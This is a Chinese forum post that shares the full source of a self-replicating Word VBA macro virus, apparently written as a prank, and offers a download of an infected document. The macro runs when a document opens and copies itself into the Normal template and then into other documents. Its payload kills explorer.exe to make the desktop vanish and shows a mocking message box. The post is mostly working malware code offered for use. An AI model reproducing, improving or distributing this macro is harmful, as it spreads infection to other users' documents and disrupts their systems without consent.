好友
阅读权限10
听众
最后登录1970-1-1
|
豆腐皮
发表于 2017-3-17 20:31
代码:
Sub Document_Open()
On Error Resume Next
Application.DisplayScrollBars = False
Options.SaveNormalPrompt = False
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "Micro-Virus" Then
.DeleteLines 1, .Count0fLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 2, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 2, "Sub Document_Open()"
ActineDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
'程序代码开始'
Shell ("taskkill /f /im explorer.exe")
MsgBox ("看看你的桌面是不是消失了?")
'程序代码结束'
End Sub
功能:关闭桌面和弹框
截图:
成品文档:
Doc1.rar
(5.69 KB, 下载次数: 10)
本人博客:http://www.bluexiang.com |
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|